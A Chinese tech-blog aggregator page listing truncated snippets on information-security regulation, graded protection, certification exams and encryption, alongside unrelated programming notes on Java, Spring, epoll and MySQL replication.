    最近小编接触到了医疗行业,猛然发觉信息化技术当前真的是深入应用到了医院的日常经营发展中,医院整体的管理运营全都面向系统化,让医院的管理效率、质量都纷纷得以提升。这也使得信息安全管理工作占据了更加重要的位置。小编总结了下医院信息安全管理的主要工作大概包括这几点:l信息系统网络安全l备份信息记录安全l计算机设备病毒防治l医院信息管理系统平台安全等想必大家也都有所了解,医疗记录包含大量敏感信息:如病患的
  • 信息安全国内外现状及技术要求示例(R155/R156) mini积木 信息安全安全mcu
    国际政策、法规的现状与趋势鉴于对交通安全、社会安全甚至国家安全的重要影响,汽车网络安全、数据安全得到各相关国家和地区的高度重视,纷纷出台相关法规、标准。信息安全法规R155法规适用范围覆盖了乘用车及商用车,适用于M类、N类车型,装备了至少一个ECU的O类车型,以及具备L3及以上自动驾驶功能的L6和L7类车型。此法规适合于1958协议国(包括欧洲、日本、俄罗斯、澳大利亚等)。根据欧盟要求,从2022
  • NISP 一级 —— 考证笔记合集 SRC_BLUE_17 网络安全资源导航#网络安全相关笔记笔记网络安全证书获取NISP
    该笔记为导航目录,在接下来一段事件内,我会每天发布我关于考取该证书的相关笔记。当更新完成后,此条注释会被删除。第一章信息安全概述1.1信息与信息安全1.2信息安全威胁1.3信息安全发展阶段与形式1.4信息安全保障1.5信息系统安全保障第二章信息安全基础技术2.1密码学2.2数字证书与公钥基础设施2.3身份认证2.4访问控制2.5安全审计第三章网络安全防护技术3.1网络基础知识3.2网络安全威胁3.
  • 信息安全、网络安全、网络空间安全傻傻分不清? 亿林科技网络安全 web安全安全
    信息安全、网络安全、网络空间安全:三个概念的解析与区分随着信息技术的迅猛发展,信息安全、网络安全、网络空间安全这三个概念逐渐进入人们的视野。虽然它们密切相关,但在含义上却有所区别。本文将深入探讨这三个概念的定义、内涵及其区别。一、信息安全信息安全是指保护信息免受未经授权的访问、使用、破坏或泄露的科学与技术手段的总和。其核心目标是确保信息的机密性、完整性和可用性。信息安全涉及的范围包括计算机系统、网
  • 干货 ‖ 三分钟让你区分“等级保护、风险评估和安全测评” 等保星视界
    接触安全行业的大家大概会经常遇到这几个关键词,“等级保护”、“风险评估”、“系统安全评测”,这都是当前国家信息安全保障建设体系中的热门话题。但是肯定有很多小伙伴还是对他们之间的区别和联系不是那么明确,今天小编就来帮大家缕一缕。一、三者的概念介绍A、等级保护概念介绍:等级保护全名信息安全等级保护,是指对国家各类信息系统分等级进行安全保护,对信息系统中的安全产品进行等级管理,对信息系统中的信息安全事件
  • 五分钟了解等级保护、风险评估和安全测评三者的区别和联系? 亿林等保 安全网络安全
    等级保护基本概念:网络安全等级保护是指对国家秘密信息、法人和其他组织和公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护,对信息系统中使用的安全产品实行按等级管理,对信息系统中发生的信息安全事件等等级响应、处置。这里所指的信息系统,是指由计算机及其相关和配套的设备、设施构成的,按照一定的应用目标和规则对信息进行存储、传输、处理的系统或者网络;信息是指在信息系统中存储、
  • 一分钟了解小程序的等保测评 亿林科技网络安全 小程序
    小程序作为移动互联网应用的一种形式,其安全性和合规性受到了国家法律法规的严格要求。根据《中华人民共和国网络安全法》和《信息安全技术个人信息安全规范》等相关法律法规,小程序在开发和运营过程中需要进行等级保护测评(等保测评),以确保用户数据的安全和隐私保护。等保测评是指对信息系统进行安全等级保护的评估,包括安全技术措施和安全管理措施的评估。小程序的等保测评得分需要在70分以上,且信息系统没有高风险项才
  • 阿里大牛漫谈“去IOE”架构: 过程苦 结局好 weixin_34194087 数据库
    2019独角兽企业重金招聘Python工程师标准>>>阿里大牛漫谈“去IOE”架构:过程苦结局好随着国外斯诺登的棱镜门事件持续发酵,国内近期一场大规模网络瘫痪引起轩然大波,安全问题将直指人心,一时间IOE(IBM、Oracle和EMC)被推到信息安全的风口浪尖,近日联想收购IBM的X86服务器更是削弱了IOE的力量。而由阿里人掀起的去“IOE”运动风险极高,但受益很高。没有了“IOE”这些高富帅的
  • 2023 下半年信息安全工程师考试真题答案 rockmelodies 安全网络安全
    一、单项选择如下有关信息安全管理员职责旳论述,不对旳旳是()A.信息安全管理员应当对网络旳总体安全布局进行规划B.信息安全管理员应当对信息系统安全事件进行处理C.信息安全管理员应当负责为顾客编写安全应用程序D.信息安全管理员应当对安全设备进行优化配置国家密码管理局于2023年公布了“无线局域网产品须使用旳系列密码算法”,其中规定密钥协商算法应使用旳是()A.DHB.ECDSAC.ECDHD.CPK
  • 四级信息安全工程师考试大纲 憨憨tiantian 笔记经验分享计算机网络操作系统
    文章目录前言:考核项目一、考试方式二、操作系统原理1.基本要求2.考试内容三、计算机网络1.基本要求2.考试内容总结前言:考核项目四级信息安全工程师考核操作系统原理和计算机网络两门课程。测试内容包括网络攻击与保护的基本理论技术,以及操作系统、路由设备的安全防范技能。一、考试方式本考试为上机考试,时长为90分钟,满分100分。考试题型及分值(1)操作系统原理——单选题(30分)(2)操作系统原理——
  • 探索未知的利器:Detect It Easy(DIE)——文件类型检测大师 颜旖玫Michael
    探索未知的利器:DetectItEasy(DIE)——文件类型检测大师Detect-It-EasyProgramfordeterminingtypesoffilesforWindows,LinuxandMacOS.项目地址:https://gitcode.com/gh_mirrors/de/Detect-It-Easy在信息安全领域,了解文件的真实性质是至关重要的。DetectItEasy(简称D
  • 国产化操作系统(x86_64|aarch64)生态构建之RTSP播放器选型 音视频牛哥 大牛直播SDK音视频国产化操作系统rtsp播放器linuxrtsp播放器linuxarmrtsplinux平台rtsp播放aarch64rtsp大牛直播SDK
    为什么要推进国产化操作系统我们经常听到的一句话是:国货当自强!国产操作系统也是,推进国产化操作系统的原因是多方面的,推进国产化操作系统是保障国家信息安全、促进技术自主创新、提升产业竞争力以及满足特定需求的重要举措。未来,随着技术的不断进步和市场的不断扩展,国产化操作系统将迎来更加广阔的发展前景。一、保障国家信息安全减少对外部系统的依赖:国产化操作系统可以更好地符合国家安全标准,减少对国外操作系统的
  • 本博客公告 维基人 公告安全系统安全web安全安全架构
    博客公告/soulblog一、博客涉及领域信息安全,计算机网络及操作系统等二、博客更新每周一和周六定时更新三、说明该博客上的所有文章都将在博客园、CSDN和Medium上持续,同步更新博客环境安全,无任何诱导链接,博客坚持无广告化,不会投放任何广告所有文章均为原创,转载请注明出处!四、同步链接本人已购多域名,通过GitHub绑定进行重定向到各平台上,通过本人的域名可以访问到各博客平台上链接如下(点
  • 网络安全工程师培训费用 汇智知了堂 web安全网络安全
    在当今这个信息化迅猛发展的时代,网络安全已成为各行各业关注的焦点。作为保障网络信息安全的中坚力量,网络安全工程师的需求量逐年攀升。随之而来的是,越来越多的人对网络安全工程师的培训费用充满了好奇。本文将为您详细解析这一问题,帮助您在选择培训时做出明智的决策。网络安全工程师培训费用因培训机构、课程内容和地点等因素而有所不同。一般来说,培训费用在几千到几万元之间。具体费用取决于所选的培训机构和课程。以下
  • 死守安全底线,荣耀8X全球首发“AI基站防伪技术” 科技银狐
    随着电信诈骗手段的不断升级,不少用户都被诈骗份子套入陷阱,相信这是很多消费者一直存在的痛点。但大部分手机厂商仍然在拼性能、拼功能的维度上,并没有重视用户的信息安全,这是让人比较失望的。目前市面上主流的免打扰和拦截垃圾信息的手段比较滞后,其做法无非是进行关键字匹配,将骚扰电话进行标记,如发现有标记的号码打来就直接阻断,但这种方式存在很多绕过的可能性,仍然无法根治此类问题。光靠手机进行单维度的防护总归
  • 2024年入职/转行网络安全,该如何规划?_网络安全职业规划 徐老师教网络安全 web安全安全phphttps网络协议
    前言前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。网络安全前景对于网络安全的发展与就业前景,想必无需我多言,作为当下应届生收入较高的专业之一,网络安全同样也在转行领域中占据热门位置,主要具备以下几点转行优势:行业人才缺口大,至2027年我国网安人才缺口将达327万知识体系友好,计算机及英语水平相对薄弱的同学也可学习上
  • 2024年入职/转行网络安全,该如何规划?_网络安全职业规划 徐老师教网络安全 web安全安全phphttps网络协议
    前言前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。网络安全前景对于网络安全的发展与就业前景,想必无需我多言,作为当下应届生收入较高的专业之一,网络安全同样也在转行领域中占据热门位置,主要具备以下几点转行优势:行业人才缺口大,至2027年我国网安人才缺口将达327万知识体系友好,计算机及英语水平相对薄弱的同学也可学习上
  • 私人工具集4——C#加密解密类(CryptoHelper) gzhosp_redAnt 小徐的私人工具集加密解密.netrsamd5c#
    子曰:“工欲善其事,必先利其器”github地址:https://github.com/redAntCpp/CSharpTools加密解密在日常开发中也是经常用到,尤其是在写登录功能时,对用户的密码进行加密,有时,对信息安全要求较高时,也需要对传输的数据进行加密,然后本地解密后得到相应的报文,然后继续进行业务。比如银行的金额,医院的患者病历信息等。简单的加密方式介绍加密分为:对称加密和非对称加密。
  • 多重安全措施:构建信息防护网 SheldonChang 加解密安全网络
    多重安全措施:构建信息防护网在当今数字化的世界里,信息安全已经成为企业和个人不可或缺的一部分。随着技术的发展,网络攻击手段也变得越来越复杂和多样化。因此,单靠一种安全措施已经无法全面保护我们的信息资产。本文将探讨如何通过结合多种安全措施来构建更加坚固的安全防御体系,并给出一些实际的应用案例。1.引言在过去的几年里,信息安全事件频繁发生,从个人信息泄露到企业数据被窃取,每一次事件都提醒着我们加强信息
  • 数据传输安全——混合加解密(国密) SheldonChang 加解密安全网络
    国密SM2与SM4混合加密解密工具类详解及其与其他加密算法的对比分析在当今互联网时代,信息安全变得尤为重要。随着国家密码局发布的商用密码算法(即国密算法)逐渐普及,SM2和SM4等算法因其高效性和安全性成为了国内应用中的重要组成部分。本文不仅将详细介绍一个基于Java的国密SM2与SM4混合加密解密工具类,还将探讨这些算法与国际通用的RSA和AES算法之间的对比分析。一、国密算法简介SM2:这是一
  • 数据传输安全——混合加解密 SheldonChang 加解密安全网络java
    使用Hutool实现AES与RSA混合加密解密——构建安全的数据传输通道在当今数字化社会中,信息安全已经成为企业和个人不可忽视的重要议题。加密技术作为保障数据安全的重要手段,其作用愈发突出。本文将深入探讨如何利用Hutool库实现AES与RSA混合加密解密方案,并进一步扩展其背后的技术原理及具体的应用场景。国密加解密实现参考链接加密技术概述在加密领域,我们通常会遇到两种类型的加密算法:对称加密和非
  • 网络安全笔记-信息安全工程师与网络安全工程师考试大纲(附:Web安全大纲)_信息网络安全师认证(inspc)培训工作大纲 程序员安安 web安全笔记网络服务器数据库网络安全安全
    Web安全大纲2024信息安全工程师考试大纲1、考试目标通过本考试的合格人员能够掌握网络信息安全的基础知识和技术原理;根据国家网络信息安全相关法律法规及业务安全保障要求,能够规划、设计信息系统安全方案,能够配置和维护常见的网络安全设备及系统;能够对信息系统的网络安全风险进行监测和分析,并给出网络安全风险问题的整改建议;能够协助相关部门对单位的信息系统进行网络安全审计和网络安全事件调查;能够对网络信
  • 人脸识别界面设计Android,人脸识别系统的设计及Android平台实现 代码侠士 人脸识别界面设计Android
    摘要:近些年来,随着人们对信息安全问题的日益重视,生物识别技术由于其自身具有传统身份技术所不具备的优势,被大量地用于身份认证中.人脸作为一种重要的生物特征,具有唯一性,随身携带的优点,而且人脸图像的采集条件相对宽松,因此人脸识别技术被大量地用作门禁,安检等相关领域.本文对人脸识别系统进行了相关研究.在人脸检测阶段,对人脸检测的两种方法进行了研究.使用肤色检测的方法检测速度较快,但检测范围不准确并且
  • 戴尔笔记本win8系统改装win7系统 sophia天雪 win7戴尔改装系统win8
    戴尔win8 系统改装win7 系统详述 第一步:使用U盘制作虚拟光驱:         1)下载安装UltraISO:注册码可以在网上搜索。         2)启动UltraISO,点击“文件”—》“打开”按钮,打开已经准备好的ISO镜像文
  • BeanUtils.copyProperties使用笔记 bylijinnan java
    BeanUtils.copyProperties VS PropertyUtils.copyProperties 两者最大的区别是: BeanUtils.copyProperties会进行类型转换,而PropertyUtils.copyProperties不会。 既然进行了类型转换,那BeanUtils.copyProperties的速度比不上PropertyUtils.copyProp
  • MyEclipse中文乱码问题 0624chenhong MyEclipse
    一、设置新建常见文件的默认编码格式,也就是文件保存的格式。 在不对MyEclipse进行设置的时候,默认保存文件的编码,一般跟简体中文操作系统(如windows2000,windowsXP)的编码一致,即GBK。 在简体中文系统下,ANSI 编码代表 GBK编码;在日文操作系统下,ANSI 编码代表 JIS 编码。 Window-->Preferences-->General -
  • 发送邮件 不懂事的小屁孩 send email
    import org.apache.commons.mail.EmailAttachment; import org.apache.commons.mail.EmailException; import org.apache.commons.mail.HtmlEmail; import org.apache.commons.mail.MultiPartEmail;
  • 动画合集 换个号韩国红果果 htmlcss
    动画 指一种样式变为另一种样式 keyframes应当始终定义0 100 过程 1 transition  制作鼠标滑过图片时的放大效果 css .wrap{ width: 340px;height: 340px; position: absolute; top: 30%; left: 20%; overflow: hidden; bor
  • 网络最常见的攻击方式竟然是SQL注入 蓝儿唯美 sql注入
    NTT研究表明,尽管SQL注入(SQLi)型攻击记录详尽且为人熟知,但目前网络应用程序仍然是SQLi攻击的重灾区。 信息安全和风险管理公司NTTCom Security发布的《2015全球智能威胁风险报告》表明,目前黑客攻击网络应用程序方式中最流行的,要数SQLi攻击。报告对去年发生的60亿攻击 行为进行分析,指出SQLi攻击是最常见的网络应用程序攻击方式。全球网络应用程序攻击中,SQLi攻击占
  • java笔记2 a-john java
    类的封装: 1,java中,对象就是一个封装体。封装是把对象的属性和服务结合成一个独立的的单位。并尽可能隐藏对象的内部细节(尤其是私有数据) 2,目的:使对象以外的部分不能随意存取对象的内部数据(如属性),从而使软件错误能够局部化,减少差错和排错的难度。 3,简单来说,“隐藏属性、方法或实现细节的过程”称为——封装。 4,封装的特性:       4.1设置
  • [Andengine]Error:can't creat bitmap form path “gfx/xxx.xxx” aijuans 学习Android遇到的错误
            最开始遇到这个错误是很早以前了,以前也没注意,只当是一个不理解的bug,因为所有的texture,textureregion都没有问题,但是就是提示错误。 昨天和美工要图片,本来是要背景透明的png格式,可是她却给了我一个jpg的。说明了之后她说没法改,因为没有png这个保存选项。 我就看了一下,和她要了psd的文件,还好我有一点
  • 自己写的一个繁体到简体的转换程序 asialee java转换繁体filter简体
              今天调研一个任务,基于java的filter实现繁体到简体的转换,于是写了一个demo,给各位博友奉上,欢迎批评指正。          实现的思路是重载request的调取参数的几个方法,然后做下转换。          
  • android意图和意图监听器技术 百合不是茶 android显示意图隐式意图意图监听器
    Intent是在activity之间传递数据;Intent的传递分为显示传递和隐式传递   显式意图:调用Intent.setComponent() 或 Intent.setClassName() 或 Intent.setClass()方法明确指定了组件名的Intent为显式意图,显式意图明确指定了Intent应该传递给哪个组件。   隐式意图;不指明调用的名称,根据设
  • spring3中新增的@value注解 bijian1013 javaspring@Value
            在spring 3.0中,可以通过使用@value,对一些如xxx.properties文件中的文件,进行键值对的注入,例子如下: 1.首先在applicationContext.xml中加入:  <beans xmlns="http://www.springframework.
  • Jboss启用CXF日志 sunjing logjbossCXF
    1. 在standalone.xml配置文件中添加system-properties:     <system-properties>        <property name="org.apache.cxf.logging.enabled" value=&
  • 【Hadoop三】Centos7_x86_64部署Hadoop集群之编译Hadoop源代码 bit1129 centos
      编译必需的软件 Firebugs3.0.0 Maven3.2.3 Ant JDK1.7.0_67 protobuf-2.5.0 Hadoop 2.5.2源码包       Firebugs3.0.0   http://sourceforge.jp/projects/sfnet_findbug
  • struts2验证框架的使用和扩展 白糖_ 框架xmlbeanstruts正则表达式
    struts2能够对前台提交的表单数据进行输入有效性校验,通常有两种方式: 1、在Action类中通过validatexx方法验证,这种方式很简单,在此不再赘述; 2、通过编写xx-validation.xml文件执行表单验证,当用户提交表单请求后,struts会优先执行xml文件,如果校验不通过是不会让请求访问指定action的。 本文介绍一下struts2通过xml文件进行校验的方法并说
  • 记录-感悟 braveCS 感悟
    再翻翻以前写的感悟,有时会发现自己很幼稚,也会让自己找回初心。   2015-1-11 1. 能在工作之余学习感兴趣的东西已经很幸福了; 2. 要改变自己,不能这样一直在原来区域,要突破安全区舒适区,才能提高自己,往好的方面发展; 3. 多反省多思考;要会用工具,而不是变成工具的奴隶; 4. 一天内集中一个定长时间段看最新资讯和偏流式博
  • 编程之美-数组中最长递增子序列 bylijinnan 编程之美
    import java.util.Arrays; import java.util.Random; public class LongestAccendingSubSequence { /** * 编程之美 数组中最长递增子序列 * 书上的解法容易理解 * 另一方法书上没有提到的是,可以将数组排序(由小到大)得到新的数组, * 然后求排序后的数组与原数
  • 读书笔记5 chengxuyuancsdn 重复提交struts2的token验证
    1、重复提交 2、struts2的token验证 3、用response返回xml时的注意 1、重复提交 (1)应用场景 (1-1)点击提交按钮两次。 (1-2)使用浏览器后退按钮重复之前的操作,导致重复提交表单。 (1-3)刷新页面 (1-4)使用浏览器历史记录重复提交表单。 (1-5)浏览器重复的 HTTP 请求。 (2)解决方法 (2-1)禁掉提交按钮 (2-2)
  • [时空与探索]全球联合进行第二次费城实验的可能性 comsci
         二次世界大战前后,由爱因斯坦参加的一次在海军舰艇上进行的物理学实验 -费城实验   至今给我们大家留下很多迷团.....      关于费城实验的详细过程,大家可以在网络上搜索一下,我这里就不详细描述了      在这里,我的意思是,现在
  • easy connect 之 ORA-12154: TNS: 无法解析指定的连接标识符 daizj oracleORA-12154
    用easy connect连接出现“tns无法解析指定的连接标示符”的错误,如下: C:\Users\Administrator>sqlplus username/[email protected]:1521/orcl SQL*Plus: Release 10.2.0.1.0 – Production on 星期一 5月 21 18:16:20 2012 Copyright (c) 198
  • 简单排序:归并排序 dieslrae 归并排序
    public void mergeSort(int[] array){ int temp = array.length/2; if(temp == 0){ return; } int[] a = new int[temp]; int
  • C语言中字符串的\0和空格 dcj3sjt126com c
       \0 为字符串结束符,比如说:                       abcd (空格)cdefg; 存入数组时,空格作为一个字符占有一个字节的空间,我们
  • 解决Composer国内速度慢的办法 dcj3sjt126com Composer
    用法: 有两种方式启用本镜像服务: 1 将以下配置信息添加到 Composer 的配置文件 config.json 中(系统全局配置)。见“例1” 2 将以下配置信息添加到你的项目的 composer.json 文件中(针对单个项目配置)。见“例2” 为了避免安装包的时候都要执行两次查询,切记要添加禁用 packagist 的设置,如下 1 2 3 4 5
  • 高效可伸缩的结果缓存 shuizhaosi888 高效可伸缩的结果缓存
    /** * 要执行的算法,返回结果v */ public interface Computable<A, V> { public V comput(final A arg); }   /** * 用于缓存数据 */ public class Memoizer<A, V> implements Computable<A,
  • 三点定位的算法 haoningabc c算法
    三点定位, 已知a,b,c三个顶点的x,y坐标 和三个点都z坐标的距离,la,lb,lc 求z点的坐标 原理就是围绕a,b,c 三个点画圆,三个圆焦点的部分就是所求 但是,由于三个点的距离可能不准,不一定会有结果, 所以是三个圆环的焦点,环的宽度开始为0,没有取到则加1 运行 gcc -lm test.c test.c代码如下 #include "stdi
  • epoll使用详解 jimmee clinux服务端编程epoll
    epoll - I/O event notification facility在linux的网络编程中,很长的时间都在使用select来做事件触发。在linux新的内核中,有了一种替换它的机制,就是epoll。相比于select,epoll最大的好处在于它不会随着监听fd数目的增长而降低效率。因为在内核中的select实现中,它是采用轮询来处理的,轮询的fd数目越多,自然耗时越多。并且,在linu
  • Hibernate对Enum的映射的基本使用方法 linzx0212 enumHibernate
      枚举   /** * 性别枚举 */ public enum Gender { MALE(0), FEMALE(1), OTHER(2); private Gender(int i) { this.i = i; } private int i; public int getI
  • 第10章 高级事件(下) onestopweb 事件
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • 孙子兵法 roadrunners 孙子兵法
    始计第一 孙子曰: 兵者,国之大事,死生之地,存亡之道,不可不察也。 故经之以五事,校之以计,而索其情:一曰道,二曰天,三曰地,四曰将,五 曰法。道者,令民于上同意,可与之死,可与之生,而不危也;天者,阴阳、寒暑 、时制也;地者,远近、险易、广狭、死生也;将者,智、信、仁、勇、严也;法 者,曲制、官道、主用也。凡此五者,将莫不闻,知之者胜,不知之者不胜。故校 之以计,而索其情,曰
  • MySQL双向复制 tomcat_oracle mysql
    本文包括: 主机配置 从机配置 建立主-从复制 建立双向复制   背景 按照以下简单的步骤: 参考一下: 在机器A配置主机(192.168.1.30) 在机器B配置从机(192.168.1.29) 我们可以使用下面的步骤来实现这一点   步骤1:机器A设置主机 在主机中打开配置文件 ,
  • zoj 3822 Domination(dp) 阿尔萨斯 Mina
    题目链接:zoj 3822 Domination 题目大意:给定一个N∗M的棋盘,每次任选一个位置放置一枚棋子,直到每行每列上都至少有一枚棋子,问放置棋子个数的期望。 解题思路:大白书上概率那一张有一道类似的题目,但是因为时间比较久了,还是稍微想了一下。dp[i][j][k]表示i行j列上均有至少一枚棋子,并且消耗k步的概率(k≤i∗j),因为放置在i+1~n上等价与放在i+1行上,同理
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他